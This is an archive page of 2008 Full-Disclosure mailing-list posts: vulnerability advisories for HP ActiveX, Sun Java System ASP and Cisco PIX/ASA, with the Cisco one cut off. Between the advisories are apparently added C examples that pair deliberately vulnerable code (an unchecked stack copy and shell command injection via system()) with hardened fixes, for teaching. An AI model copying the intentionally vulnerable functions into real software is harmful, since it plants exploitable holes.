[Full-disclosure] CSIS-RI-0003: Multiple buffer overflow vulnerabilities in HP ActiveX

2008-06-04 Thread Dennis Rand
Multiple buffer overflow vulnerabilities in HP Software

 

Hewlett-Packard (HP) is the world's largest PC dealer. According to IDC,
HP shipped 14.7 million units worldwide, a 23.3 percent year-over-year
growth and a 19 percent market share. 

 

PCs and laptops from HP are often shipped with preinstalled software
running on Microsoft Windows. The software is designed so the end user
can keep drivers and HP software automatically updated. This is done
through an ActiveX plugin for Microsoft Internet Explorer.

 

CSIS has discovered multiple high-risk vulnerabilities in several parts
of that specific software. The affected components are found preinstalled
on a broad range of HP equipment but are also installed when an end user
visits HP's webpage in order to access software updates such as
applications, drivers and firmware for multiple HP products.

 

We have discovered eight different vulnerabilities of which five should
be considered highly critical since they allow remote code execution.

 

At least five of these vulnerabilities have been confirmed to work in a
typical drive-by scenario. All it takes to exploit is to lure a user
into visiting a hostile and specifically crafted website. The attack
could also be done through SQL and HTML injection. This would allow an
attacker, if the system is found vulnerable, to run arbitrary code and
take complete control of the system, or at least act with the privileges
of the logged-on user. In order for this scenario to work it would only
require one of the affected ActiveX objects to be installed and Active
scripting to be enabled in Microsoft Internet Explorer, which it is by
default.

 

The vulnerability was discovered and reported by Dennis Rand from CSIS
Security Group.

 

HP has released an advisory and update to address these vulnerabilities.


HP Instant Support HPISDataManager.dll Running on Windows, Remote
Execution of Arbitrary Code

 

http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264

 

Technical advisory with PoC can be downloaded here:

 
http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages File Creation Vulnerability

2008-06-04 Thread iDefense Labs
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of a file creation vulnerability in Sun
Microsystems' Java System Active Server Pages allows attackers to
execute arbitrary code with root privileges.

The vulnerability exists within a file included by several ASP
applications. This file provides a function that will write the
contents contained within its first parameter to a file specified by
its second parameter. Several ASP applications allow an attacker to
control both the content and the location of the file written.

III. ANALYSIS

Exploitation allows an attacker to create, or append to, arbitrary files
on the system with root privileges. No authentication is required to
reach the affected ASP applications. The attacker only needs to be able
to establish a session with the administration server on TCP port 5100.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, disable the
administration server by executing the following command as the 'root'
user.

  # /opt/casp/admtool -e

Additionally, removing the affected ASP applications will prevent
exploitation.

VI. VENDOR RESPONSE

Sun Microsystems has addressed this vulnerability with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2401 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/04/2007  Initial vendor notification
04/05/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Buffer Overflow Vulnerability

2008-06-04 Thread iDefense Labs
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Sun
Microsystems' Java System Active Server Pages allows attackers to
execute arbitrary code in the context of the ASP server.

The vulnerability exists within the request handling code within the ASP
server. An attacker supplied string is copied into a fixed size stack
buffer without first validating that there is sufficient space
available. By supplying a specially crafted request, an attacker can
cause a stack-based buffer overflow.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary code in the context
of the ASP server. This vulnerability can be reached from a normal web
server, usually on TCP port 80, configured to pass requests for ASP
applications through the ASP server. No authentication is required to
exploit this vulnerability. If this service is configured to run with
root privileges it is possible to gain complete control over the
affected system.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this
issue.

However, configuring the ASP server to run with reduced privileges can
help prevent a complete compromise. This can be accomplished via the
"Inherit user security" setting or setting a user and group to run with
when using the "Defined user security" mode.

VI. VENDOR RESPONSE

Sun Microsystems has addressed this vulnerability with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2404 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/04/2007  Initial vendor notification
04/05/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
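The buffer overflow advisory above describes the classic pattern: a request string copied into a fixed-size stack buffer with no check that it fits. The following is an added illustration and is not iDefense's or Sun's code; the buffer size FIELD_MAX, the function names and the sample requests are constructed for the example. It shows the unchecked copy next to a hardened version that measures the input with a bound and refuses anything too long, which is the shape of fix a vendor ships for this class of bug.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FIELD_MAX 64   /* size of the fixed stack buffer (constructed value) */

/* Length of s, never reading more than max bytes. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Vulnerable pattern from the advisory: the request string is copied into
 * a fixed-size stack buffer with no check that it fits. An input of
 * FIELD_MAX bytes or more runs past the end of `field` and corrupts the
 * stack frame. Shown for contrast only; not exercised with long input. */
int parse_field_unchecked(const char *request)
{
    char field[FIELD_MAX];
    strcpy(field, request);              /* no length validation */
    return (int)strlen(field);
}

/* Hardened form: measure the input with a bound, refuse anything that does
 * not fit, then copy exactly that many bytes and NUL-terminate. */
int parse_field_checked(const char *request)
{
    char field[FIELD_MAX];
    size_t len = bounded_len(request, FIELD_MAX);
    if (len >= FIELD_MAX) {
        return -1;                        /* too long: reject the request */
    }
    memcpy(field, request, len);
    field[len] = '\0';
    return (int)len;
}

/* Builds a request of n copies of c (constructed input) and runs it through
 * the checked parser, so oversized inputs can be tested without a literal. */
int checked_parse_of_repeated(char c, size_t n)
{
    char *buf = malloc(n + 1);
    if (buf == NULL) return -1;
    memset(buf, c, n);
    buf[n] = '\0';
    int rc = parse_field_checked(buf);
    free(buf);
    return rc;
}

int main(void)
{
    printf("short request   -> %d\n", parse_field_checked("GET /index.asp"));
    printf("63-byte request -> %d\n", checked_parse_of_repeated('A', 63));
    printf("64-byte request -> %d\n", checked_parse_of_repeated('A', 64));
    return 0;
}
```

The boundary case matters: an input of exactly FIELD_MAX bytes has no room for the terminating NUL, so the check is `len >= FIELD_MAX`, not `>`. Returning an error code rather than truncating silently also lets the caller log the rejected request, which is the signal a defender wants from a service exposed on port 80.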


[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Information Disclosure Vulnerability

2008-06-04 Thread iDefense Labs
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of an information disclosure vulnerability in Sun
Microsystems' Java System Active Server Pages allows attackers to
obtain sensitive information.

This vulnerability exists due to the placement of the password and
configuration data within the application server root directory. By
making requests for specific, sensitive documents an attacker could
obtain the configuration or password hashes of allowed users.

III. ANALYSIS

Exploitation allows an attacker to gain sensitive information from the
server. No authentication is required to reach the affected ASP
applications. The attacker only needs to be able to establish a session
with the administration server on TCP port 5100.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, disable the
administration server by executing the following command as the 'root'
user.

  # /opt/casp/admtool -e

VI. VENDOR RESPONSE

Sun Microsystems has addressed this vulnerability with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2402 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/04/2007  Initial vendor notification
04/05/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Multiple Command Injection Vulnerabilities

2008-06-04 Thread iDefense Labs
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of multiple command injection vulnerabilities in Sun
Microsystems' Java System Active Server Pages allows attackers to
execute arbitrary code with root privileges.

These vulnerabilities exist within several ASP applications that execute
shell commands. The problem lies in the fact that these applications do
not filter or escape the parameters passed to these commands. By
inserting shell meta-characters into an HTTP request, an attacker is
able to execute arbitrary shell commands.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary shell commands with
elevated privileges. Since this server runs with root privileges, an
attacker could gain complete control of the affected system.

Note that authentication is required to reach these ASP applications via
the administration server on TCP port 5100. However, several methods of
bypassing and circumventing authentication have been discovered,
rendering that requirement irrelevant.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

Removing the affected ASP applications from the system can prevent
exploitation of these vulnerabilities.

Additionally, using firewalls to limit access to the administration
server (TCP port 5100) and the ASP application server (TCP port 5102)
can help mitigate these issues.

VI. VENDOR RESPONSE

Sun Microsystems has addressed these vulnerabilities with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2405 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/11/2007  Initial vendor notification
05/11/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

One of these vulnerabilities was reported to iDefense by an anonymous
researcher. Further research by Joshua J. Drake (iDefense Labs)
uncovered an additional vulnerability.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
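The command injection advisory above comes down to one defect: request parameters are spliced into a shell command line without filtering or escaping. The example below is added here and is not iDefense's or Sun's code; the `id` lookup, the allowlist policy and the function names are constructed for illustration. It puts the shell-based pattern beside the two-part fix a defender actually wants: reject parameters outside a strict allowlist, and run the program with an argv array so no shell ever parses the input.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern from the advisory: a request parameter is spliced
 * into a command line and handed to a shell, so metacharacters in the
 * parameter are interpreted as further commands. Shown for contrast only. */
int lookup_user_via_shell(const char *user)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "id %s", user);   /* no filtering or escaping */
    return system(cmd);
}

/* Allowlist check for a single argument (hypothetical policy): letters,
 * digits, '.', '_' and '-' only, non-empty, and not starting with '-' so
 * the program cannot read it as an option. Rejecting is preferred over
 * escaping because there are no shell quoting rules to get wrong. */
int param_is_safe(const char *p)
{
    if (p == NULL || p[0] == '\0' || p[0] == '-') return 0;
    for (const unsigned char *c = (const unsigned char *)p; *c != '\0'; c++) {
        if (!isalnum(*c) && *c != '.' && *c != '_' && *c != '-') return 0;
    }
    return 1;
}

/* Hardened form: validate, then exec the program directly with an argv
 * array. No shell is involved, so there is nothing to inject into.
 * Returns the child's exit status, or -1 if the argument is rejected or
 * the child could not be started. */
int lookup_user_without_shell(const char *user)
{
    if (!param_is_safe(user)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "id", (char *)user, NULL };
        execvp("id", argv);
        _exit(127);                       /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* constructed parameters: one clean, one carrying a shell separator */
    printf("clean parameter   -> %d\n", lookup_user_without_shell("alice"));
    printf("tainted parameter -> %d\n", lookup_user_without_shell("alice;id"));
    return 0;
}
```

The allowlist is deliberately narrow; widen it only for characters the downstream program genuinely needs, and keep the rejection of a leading `-`, which closes the option-injection variant that survives even when no shell is involved. Logging every rejected parameter gives the administration server on port 5100 an audit trail of attempted injections.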


[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Multiple Directory Traversal Vulnerabilities

2008-06-04 Thread iDefense Labs
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of multiple directory traversal vulnerabilities in
Sun Microsystems' Java System Active Server Pages allows attackers to
obtain the contents of, and delete, sensitive files on the system.

Both vulnerabilities exist within ASP applications included with the
product. When accessed via the administration server, the ASP engine
does not prevent directory traversal using the "../" construct. By
supplying a specially crafted HTTP request to one of the affected ASP
applications, an attacker is able to read from arbitrary files.

One of the applications will disclose only the first and third lines of
the file. Once the application is finished processing the file, it will
delete it.

III. ANALYSIS

Exploitation allows an attacker to gain sensitive information from the
server. No authentication is required to reach the affected ASP
applications. The attacker only needs to be able to establish a session
with the administration server on TCP port 5100.

Since the server process runs with root privileges, an attacker could
obtain the contents of, or delete, any file on the system. It is
interesting to note that attempting to exploit these vulnerabilities
via the web server results in an error as shown below.

  [Fri Feb 23 18:16:49 2007] Server object, 80004005, ASP 0175~Disallowed
Path Characters~The '..' characters are not allowed in the Path parameter
for the MapPath method.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

In order to prevent exploitation of these vulnerabilities, disable the
administration server by executing the following command as the 'root'
user.

  # /opt/casp/admtool -e

Additionally, removing the affected ASP applications will prevent
exploitation of these vulnerabilities.

VI. VENDOR RESPONSE

Sun Microsystems has addressed these vulnerabilities with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2403 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/04/2007  Initial vendor notification
04/05/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of these vulnerabilities wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
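Two of the advisories above share a root cause: the file creation issue lets a request choose the destination path of a write, and the directory traversal issue lets a request walk out of the application directory with "../". Both are closed by confining every request-supplied path to a fixed root before the file is opened, written or deleted. The example below is added here and is not iDefense's or Sun's code; the root directory /opt/casp/data, the function names and the sample paths are constructed for illustration. It resolves "." and ".." lexically, refuses any path that would climb above the root, and returns the confined absolute path for the caller to use.

```c
#include <stdio.h>
#include <string.h>

#define DATA_ROOT "/opt/casp/data"   /* hypothetical application root */
#define MAX_SEGS  64

/* Resolve `user_path` lexically beneath `root`: "." is dropped, ".." pops
 * the previous segment and is refused if it would climb above root, and a
 * leading '/' is treated as relative to root. No filesystem access is
 * needed, so the check can run before any open(), write() or unlink().
 * Returns 0 and fills `out`, or -1 if the path is rejected or too long. */
int confine_path(const char *root, const char *user_path, char *out, size_t outlen)
{
    const char *segs[MAX_SEGS];
    size_t seglen[MAX_SEGS];
    size_t depth = 0;
    const char *p = user_path;

    while (*p != '\0') {
        while (*p == '/') p++;            /* skip separators */
        if (*p == '\0') break;
        const char *start = p;
        while (*p != '\0' && *p != '/') p++;
        size_t n = (size_t)(p - start);
        if (n == 1 && start[0] == '.') continue;
        if (n == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0) return -1;    /* would escape the root */
            depth--;
            continue;
        }
        if (depth == MAX_SEGS) return -1;
        segs[depth] = start;
        seglen[depth] = n;
        depth++;
    }

    size_t used = strlen(root);
    if (used >= outlen) return -1;
    memcpy(out, root, used);
    for (size_t i = 0; i < depth; i++) {
        if (used + 1 + seglen[i] >= outlen) return -1;
        out[used++] = '/';
        memcpy(out + used, segs[i], seglen[i]);
        used += seglen[i];
    }
    out[used] = '\0';
    return 0;
}

/* Convenience wrappers using the hypothetical DATA_ROOT. */
int path_allowed(const char *user_path)
{
    char buf[512];
    return confine_path(DATA_ROOT, user_path, buf, sizeof buf) == 0;
}

const char *resolved_path(const char *user_path)
{
    static char buf[512];
    return confine_path(DATA_ROOT, user_path, buf, sizeof buf) == 0 ? buf : NULL;
}

int main(void)
{
    /* constructed request paths: two legitimate, one traversal attempt */
    const char *samples[] = { "config/site.asp", "logs/../logs/app.log", "../../outside.txt" };
    for (size_t i = 0; i < 3; i++) {
        const char *r = resolved_path(samples[i]);
        printf("%-22s -> %s\n", samples[i], r ? r : "REJECTED");
    }
    return 0;
}
```

This check is lexical only: a symbolic link inside the root can still point outside it, so a service that runs as root should additionally open the confined path and compare `realpath()` of the opened file against the root, or run without root privileges so the blast radius of a miss is bounded. A rejected path is also a clean detection signal worth logging, since "../" in a request to the administration server has no legitimate use.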


[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Authorization Bypass Vulnerability

2008-06-04 Thread iDefense Labs
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of a design error in Sun Microsystems' Java System
Active Server Pages allows attackers to bypass administration server
authentication mechanisms.

The vulnerability exists due to improper design of the ASP application
server. The administration application server exists as a stand-alone
service that listens on TCP port 5102. By connecting directly to this
service and making requests, attackers are able to bypass
authentication mechanisms introduced by the administration HTTP server.

III. ANALYSIS

Exploitation allows an attacker to bypass authentication restrictions
imposed by the HTTP server. No authentication is required to
communicate with the affected administration application server. The
attacker only needs to be able to establish a session with the
administration application server on TCP port 5102.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, disable the
administration server by executing the following command as the 'root'
user.

  # /opt/casp/admtool -e

VI. VENDOR RESPONSE

Sun Microsystems has addressed this vulnerability with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2406 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/11/2007  Initial vendor notification
05/11/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Metasploit - Hack ?

2008-06-04 Thread n3td3v
On Mon, Jun 2, 2008 at 6:57 PM, H D Moore <[EMAIL PROTECTED]> wrote:
> Looks like someone is doing ARP poisoning at the ISP level. The actual
> metasploit.com server(s) are untouched, but someone is still managing to
> MITM a large portion of the incoming traffic. To make things even more
> fun, it's coinciding with a DoS attack (syn floods) on most of the open
> services.
>
> If you are worried about the Metasploit Framework source code being
> MITM'd during SVN checkouts, use the SSL version of the SVN tree:
>
> $ svn co https://metasploit.com/svn/framework3/trunk/
>
> -HD
>
>
> On Monday 02 June 2008, Jacques Erasmus wrote:
>> Seems like the metasploit site has been hacked.
>
>

I found this post [1] on my newsgroup; it sounds like an awful
coincidence though.

[1] http://groups.google.com/group/n3td3v/browse_thread/thread/41b832968eacf1d9

All the best,

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread n3td3v
On Tue, Jun 3, 2008 at 12:26 AM, kat <[EMAIL PROTECTED]> wrote:
> Brazil!
>

No, in fact not, but Zone-H rats have been able to shed light on the
origin of the attackers.

http://www.zone-h.org/content/view/14948/1/

I can't believe I just gave this site hits, but it helps solve the mystery!!!

The day Zone-H closes shop, the day I party like a mother fo!

All the best,

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and Cisco ASA

2008-06-04 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and
Cisco ASA

Document ID: 105444

Advisory ID: cisco-sa-20080604-asa

http://www.cisco.com/warp/public/707/cisco-sa-20080604-asa.shtml

Revision 1.0

For Public Release 2008 June 04 1600 UTC (GMT)

- -

Summary
===

Multiple vulnerabilities exist in the Cisco ASA 5500 Series Adaptive
Security Appliances and Cisco PIX Security Appliances. This security
advisory outlines details of these vulnerabilities:

  * Crafted TCP ACK Packet Vulnerability
  * Crafted TLS Packet Vulnerability
  * Instant Messenger Inspection Vulnerability
  * Vulnerability Scan Denial of Service
  * Control-plane Access Control List Vulnerability

The first four vulnerabilities may lead to a denial of service (DoS)
condition and the fifth vulnerability may allow an attacker to bypass
control-plane access control lists (ACL).

Note:  These vulnerabilities are independent of each other. A device
may be affected by one vulnerability and not affected by another.

Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of these
vulnerabilities are available.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080604-asa.shtml

Affected Products
=

Vulnerable Products
+--

The following are the details about each vulnerability described
within this advisory.

Crafted TCP ACK Packet Vulnerability
+---

Cisco ASA and Cisco PIX devices are affected by a crafted TCP
acknowledgment (ACK) packet vulnerability. Software versions prior to
7.1(2)70 on the 7.1.x release, 7.2(4) on the 7.2.x release, and
8.0(3)10 on the 8.0.x release are affected. Cisco ASA or Cisco PIX
security appliances running software version 7.0.x, or 8.1.x are not
vulnerable.

Cisco ASA and Cisco PIX devices running versions 7.1.x and 7.2.x with
WebVPN, SSL VPN, or ASDM enabled are affected by this vulnerability.
Devices running software versions on the 8.0 release that are
configured for Telnet, Secure Shell (SSH), WebVPN, SSL VPN, or ASDM
enabled are affected by this vulnerability.

Note: Devices running IPv4 and IPv6 are affected by this
vulnerability.

Crafted TLS Packet Vulnerability
+---

Cisco ASA and Cisco PIX devices are affected by a crafted TLS request
vulnerability if the HTTPS server on the Cisco ASA or Cisco PIX
device is enabled and is running software versions prior to 8.0(3)9
on the 8.0.x release or prior to version 8.1(1)1 on the 8.1.x
release. Cisco ASA and Cisco PIX appliances running software versions
7.x are not vulnerable.

Instant Messenger Inspection Vulnerability
+-

Cisco ASA and Cisco PIX devices are affected by a crafted packet
vulnerability if Instant Messaging Inspection is enabled and the
device is running software versions prior to 7.2(4) on the 7.2.x
release, 8.0(3)10 on the 8.0.x release, or 8.1(1)2 on the 8.1.x
release. Devices running software versions in the 7.0.x and 7.1.x
